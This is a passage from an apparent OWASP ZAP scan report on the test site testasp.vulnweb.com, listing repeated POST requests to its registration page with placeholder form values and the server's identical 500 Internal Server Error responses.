Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> 